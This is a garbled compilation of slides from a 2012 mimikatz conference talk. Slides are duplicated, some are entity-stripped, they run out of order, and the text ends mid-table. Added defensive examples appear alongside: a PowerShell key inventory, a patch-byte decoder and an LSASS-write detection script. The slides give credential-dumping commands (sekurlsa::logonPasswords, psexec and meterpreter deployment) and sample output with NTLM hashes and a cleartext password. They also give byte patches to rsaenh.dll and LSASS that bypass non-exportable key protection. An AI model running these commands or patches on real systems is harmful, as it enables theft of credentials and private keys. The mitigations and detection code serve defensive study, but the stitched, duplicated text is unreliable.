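An added example, not from the talk or the mimikatz project: a PowerShell inventory of the RSA private keys in a certificate store that reports, for each key, whether it is held by one of the rsaenh.dll-based CSPs named in the patch/capi limitations or by the Microsoft Software Key Storage Provider named in the patch/cng limitations, and whether the provider flags it exportable. It assumes Windows PowerShell 5.1 with .NET 4.6 or later (for GetRSAPrivateKey); the store path, function names and finding labels are my own. Keys on software providers are reported whether or not the flag is set, because the flag is the check the talk shows being patched out; those keys are the candidates for the smartcard, HSM or TPM KSP options listed above.

```powershell
# Added example (not from the talk): list RSA private keys in a store and flag
# the ones whose "not exportable" property is enforced only by software:
# rsaenh.dll (CAPI, inside the calling process) or the Microsoft Software KSP
# (CNG, inside the KeyIso service in LSASS).
# Assumes Windows PowerShell 5.1 / .NET 4.6+ and, like the talk, only RSA keys.

param(
    [string]$StorePath = 'Cert:\LocalMachine\My'   # assumption: machine store by default
)

# The five CAPI providers the talk lists as "all based on rsaenh.dll".
$RsaEnhProviders = @(
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider'
)
$SoftwareKsp = 'Microsoft Software Key Storage Provider'

function Get-RsaKeyInfo {
    # Returns where a certificate's RSA private key lives and whether its
    # provider reports it as exportable; $null when there is no RSA key to inspect.
    param([System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

    if (-not $Cert.HasPrivateKey) { return $null }
    $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
    if ($null -eq $rsa) { return $null }

    if ($rsa -is [System.Security.Cryptography.RSACng]) {
        # CNG: the key material stays in KeyIso (LSASS); this process holds a handle.
        $key = $rsa.Key
        $allowExport = [System.Security.Cryptography.CngExportPolicies]::AllowExport
        return [pscustomobject]@{
            Api        = 'CNG'
            Provider   = $key.Provider.Provider
            Container  = $key.KeyName
            KeySize    = $key.KeySize
            Exportable = (($key.ExportPolicy -band $allowExport) -ne 0)
        }
    }
    if ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
        # CAPI: the CSP DLL (rsaenh.dll for the providers above) runs in this process.
        $info = $rsa.CspKeyContainerInfo
        return [pscustomobject]@{
            Api        = 'CAPI'
            Provider   = $info.ProviderName
            Container  = $info.KeyContainerName
            KeySize    = $rsa.KeySize
            Exportable = $info.Exportable
        }
    }
    return $null
}

function Get-KeyFindings {
    # Labels (my own) for the conditions in the talk. A software provider is
    # reported even when the key is marked non-exportable: that flag is a check
    # inside rsaenh.dll / the software KSP, not a property of where the key lives.
    param($Info)
    $findings = @()
    if ($Info.Exportable) { $findings += 'Exportable' }
    if ($Info.Api -eq 'CAPI' -and $RsaEnhProviders -contains $Info.Provider) { $findings += 'rsaenh-CSP' }
    if ($Info.Api -eq 'CNG'  -and $Info.Provider -eq $SoftwareKsp)            { $findings += 'Software-KSP' }
    if ($findings.Count -eq 0) { $findings += 'Hardware/other provider' }
    return ($findings -join ', ')
}

Get-ChildItem -Path $StorePath | ForEach-Object {
    $cert = $_
    try   { $info = Get-RsaKeyInfo -Cert $cert }
    catch { $info = $null }            # e.g. no access to a machine key when not elevated
    if ($null -eq $info) { return }    # skip: no RSA private key we can inspect
    [pscustomobject]@{
        Subject    = $cert.Subject
        Thumbprint = $cert.Thumbprint
        Api        = $info.Api
        Provider   = $info.Provider
        KeySize    = $info.KeySize
        Exportable = $info.Exportable
        Findings   = Get-KeyFindings -Info $info
    }
} | Format-Table -AutoSize
```

Run it elevated against Cert:\LocalMachine\My to see computer keys, and as the user against Cert:\CurrentUser\My; the "Findings" column is what to review against the hardening list.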
mimikatz: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz: that’s all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You for your attention
Questions?
Don’t be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz sekurlsa: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
[Diagram: lsasrv globals inside lsass – g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8]); mimikatz copies them from lsass…]
mimikatz sekurlsa: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
[Diagram: lsasrv globals inside lsass – InitializationVector (BYTE[16]), h3DesKey and hAesKey (pointers to the KIWI_BCRYPT_KEY structures below); mimikatz copies them from lsass…]

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE  data;   /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa: memo
Security Packages
Package          Symbols                                                   Type
tspkg            tspkg!TSGlobalCredTable                                   RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                                     LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList                        LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList                             LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                      RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList, lsasrv!LogonSessionListCount     LIST_ENTRY, ULONG

Protection Keys
Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key     NT 6 Symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz sekurlsa: memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        livessp :
         n.t. (LUID KO)
mimikatz sekurlsa: what we can do
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless!)
– For privileged accounts, network login instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs!
– Use a separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Leave opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi: because I own my process
So what? A module in my own process returns that I can't do something... CryptoAPI is in my memory space, let's patch it.
I wrote "4" bytes in my memory space.
before:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
after:
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

before:
.text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
after:
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz crypto patchcapi: demo time
Import, export, import as not exportable... export.
mimikatz crypto patchcapi: limitations
Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little...
mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz crypto cng: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
The process uses RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
– It is, but it's not perfect...
mimikatz crypto cng: how it's exported (PLAYSKOOL level)
[Diagram] Process --CNG--> RPC --> KeyIso Service (LSASS process; on NT6 a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP)
[Diagram] Inside KeyIso: Ask to export Key -> Load Private Key -> DPAPI Decode -> Exportable? -> yes: Exported Key / no: NTE_NOT_SUPPORTED
mimikatz crypto patchcng: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to ncrypt!SPCryptExportKey inside lsass (keyiso).
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportKeys
[user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
	mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
Exportable
mimikatz crypto patchcng: because sometimes I own LSASS
This time, the checks and the keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
before:
.text:6C815210 75 1C    jnz  short continue_key_export
after:
.text:6C815210 EB 1C    jmp  short continue_key_export
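Why "4" bytes for CryptoAPI but "1" byte for CNG: in both listings only the opcode bytes change, the displacement is untouched, so the patched site still lands on the same label. The following added example (not code from the slides or from mimikatz) decodes the bytes shown above, checks that the branch target is preserved, and counts the differing bytes, which is also exactly the diff an in-memory code integrity check of rsaenh.dll or ncrypt would report.

```python
# Added example: decode the x86 branch encodings from the two patch listings,
# verify the patched bytes keep the same branch target, and count the bytes
# that actually differ. Byte strings and addresses are copied from the slides.
import struct


def decode_branch(addr, code):
    """Decode one branch at `addr`. Returns (mnemonic, length, target).

    Handles the encodings used in the listings: 0F 85 rel32 (jnz),
    E9 rel32 (jmp), 75 rel8 (jnz short) and EB rel8 (jmp short).
    A leading 90 (nop) is skipped so the patched site decodes as well.
    """
    off = 0
    while code[off] == 0x90:                 # skip the NOP written by the patch
        off += 1
    op = code[off]
    if op == 0x0F and code[off + 1] == 0x85:
        rel, length, mnem = struct.unpack_from("<i", code, off + 2)[0], off + 6, "jnz"
    elif op == 0xE9:
        rel, length, mnem = struct.unpack_from("<i", code, off + 1)[0], off + 5, "jmp"
    elif op == 0x75:
        rel, length, mnem = struct.unpack_from("<b", code, off + 1)[0], off + 2, "jnz short"
    elif op == 0xEB:
        rel, length, mnem = struct.unpack_from("<b", code, off + 1)[0], off + 2, "jmp short"
    else:
        raise ValueError("unsupported opcode %#x" % op)
    # x86 relative branches are taken from the end of the instruction
    target = (addr + length + rel) & 0xFFFFFFFF
    return mnem, length, target


def patch_diff(original, patched):
    """Offsets of the bytes that differ between two same-length sequences."""
    if len(original) != len(patched):
        raise ValueError("patch must not change the code size")
    return [i for i, (a, b) in enumerate(zip(original, patched)) if a != b]


# (load address, original bytes, patched bytes) as shown in the listings
CAPI_SITES = [
    (0x0AC0B7CB, bytes.fromhex("0F8533C7FFFF"), bytes.fromhex("90E933C7FFFF")),
    (0x0AC1F749, bytes.fromhex("0F85B63BFFFF"), bytes.fromhex("90E9B63BFFFF")),
]
CNG_SITE = (0x6C815210, bytes.fromhex("751C"), bytes.fromhex("EB1C"))


def analyse(sites):
    """Per site: (original target, patched target, number of bytes changed)."""
    results = []
    for addr, orig, new in sites:
        _, _, t_orig = decode_branch(addr, orig)
        _, _, t_new = decode_branch(addr, new)
        results.append((t_orig, t_new, len(patch_diff(orig, new))))
    return results


def total_bytes_written(sites):
    """Total number of bytes a patcher must write for these sites."""
    return sum(changed for _, _, changed in analyse(sites))


if __name__ == "__main__":
    for site, (t_orig, t_new, n) in zip(CAPI_SITES + [CNG_SITE],
                                        analyse(CAPI_SITES + [CNG_SITE])):
        print("%08X: target %08X -> %08X, %d byte(s) changed" % (site[0], t_orig, t_new, n))
    print("CAPI patch writes %d bytes, CNG patch writes %d byte" %
          (total_bytes_written(CAPI_SITES), total_bytes_written([CNG_SITE])))
```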
mimikatz crypto patchcng: demo time
Import, export, import as not exportable... export again.
mimikatz crypto patchcng: limitations
The patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the certificates MMC snap-in cannot export CNG certificates... even those that are exportable (huh?)
– certutil can...
mimikatz crypto patchcng: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
– Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
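The defender's side of the bonus above: the precondition is a process obtaining write access to LSASS, and afterwards every PFX export of a "non exportable" CNG key on that host succeeds until KeyIso or the machine restarts. The following added example (not from the slides) runs that correlation over constructed Sysmon-style ProcessAccess (Event ID 10) and ProcessCreate (Event ID 1) records; Sysmon and the JSON-lines layout are assumptions, not something the talk mentions.

```python
# Added example: flag processes that obtain write access to lsass.exe and
# treat later certutil -exportPFX runs on the same host as suspect, because a
# patched KeyIso keeps serving every user until the service or the box restarts.
# Event layout (JSON lines with Sysmon field names) is an assumption.
import json

PROCESS_VM_OPERATION = 0x0008   # needed to change page protection before writing
PROCESS_VM_WRITE = 0x0020       # WriteProcessMemory
LSASS_SUFFIX = "\\lsass.exe"

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = r"""
{"ts": "2012-11-07T10:01:00", "EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"ts": "2012-11-07T10:02:10", "EventID": 10, "SourceImage": "C:\\Temp\\tool.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1F0FFF"}
{"ts": "2012-11-07T10:02:40", "EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx"}
{"ts": "2012-11-07T10:05:00", "EventID": 10, "SourceImage": "C:\\Windows\\System32\\taskmgr.exe", "TargetImage": "C:\\Windows\\System32\\notepad.exe", "GrantedAccess": "0x1FFFFF"}
{"ts": "2012-11-07T10:06:00", "EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -user -store My"}
"""


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_lsass_write(ev):
    """ProcessAccess on lsass.exe whose granted mask allows writing memory.

    Query-only masks such as 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) are
    normal for many system components and are not flagged.
    """
    if ev.get("EventID") != 10:
        return False
    if not ev.get("TargetImage", "").lower().endswith(LSASS_SUFFIX):
        return False
    mask = int(ev["GrantedAccess"], 16)
    return bool(mask & (PROCESS_VM_WRITE | PROCESS_VM_OPERATION))


def is_pfx_export(ev):
    """ProcessCreate of certutil asked to export a PFX (private key included)."""
    return (ev.get("EventID") == 1
            and ev.get("Image", "").lower().endswith("\\certutil.exe")
            and "-exportpfx" in ev.get("CommandLine", "").lower())


def correlate(events):
    """Return (writers, suspicious_exports) in timestamp order.

    writers:            (ts, SourceImage) for every LSASS write-capable access.
    suspicious_exports: (ts, CommandLine) for PFX exports seen after the first
                        LSASS write. A reboot or KeyIso restart would clear the
                        tainted state; that event is not modelled here.
    """
    writers, exports = [], []
    tainted_since = None
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_lsass_write(ev):
            writers.append((ev["ts"], ev["SourceImage"]))
            tainted_since = tainted_since or ev["ts"]
        elif is_pfx_export(ev) and tainted_since is not None:
            exports.append((ev["ts"], ev["CommandLine"]))
    return writers, exports


if __name__ == "__main__":
    found_writers, found_exports = correlate(parse_events(SAMPLE_EVENTS))
    for ts, image in found_writers:
        print("LSASS write access:", ts, image)
    for ts, cmd in found_exports:
        print("PFX export on tainted host:", ts, cmd)
```

In production the SourceImage of known, signed security agents that legitimately open LSASS should be allow-listed before alerting, and a KeyIso service restart or boot event should reset the tainted state.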
mimikatz crypto: memo
Some commands
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz crypto: what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computer
– no admin, no admin, no admin...
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM/AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker/SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– ...
...
mimikatz: that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, ...
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz sekurlsa: LsaEncryptMemory (NT6)
Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES
[Diagram] lsasrv, inside lsass, holds InitializationVector : BYTE[16], h3DesKey and hAesKey; mimikatz copies them...

typedef struct _KIWI_BCRYPT_KEY_DATA {
	DWORD size;
	DWORD tag;
	DWORD type;
	DWORD unk0;
	DWORD unk1;
	DWORD unk2;
	DWORD unk3;
	PVOID unk4;
	BYTE  data;   /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
	DWORD size;
	DWORD type;
	PVOID unk0;
	PKIWI_BCRYPT_KEY_DATA cle;
	PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa: memo

Security Packages
Package         Symbols                                                  Type
tspkg           tspkg!TSGlobalCredTable                                  RTL_AVL_TABLE
wdigest         wdigest!l_LogSessList                                    LIST_ENTRY
livessp         livessp!LiveGlobalLogonSessionList                       LIST_ENTRY
kerberos (nt5)  kerberos!KerbLogonSessionList                            LIST_ENTRY
kerberos (nt6)  kerberos!KerbGlobalLogonSessionTable                     RTL_AVL_TABLE
msv1_0          lsasrv!LogonSessionList / lsasrv!LogonSessionListCount   LIST_ENTRY / ULONG

Protection Keys
Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey / lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey / lsasrv!g_Feedback

Key     NT 6 Symbols
